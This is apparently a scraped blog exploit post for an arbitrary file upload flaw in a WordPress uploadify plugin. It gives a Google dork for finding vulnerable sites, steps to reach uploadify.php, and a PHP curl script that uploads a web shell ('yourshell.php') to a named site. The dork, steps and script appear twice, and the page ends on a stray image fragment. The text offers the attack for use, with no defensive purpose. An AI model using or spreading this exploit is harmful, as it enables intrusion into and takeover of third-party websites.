Exploit Title:Wordpress plugin Arbitary File Upload All Version
Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
==>after going to your desire site u will find a file/folder [uploadify] u need to click there
sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
==>after going to your desire site u will find a file/folder [uploadify] u need to click there
sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
.jpeg)
0 Komentar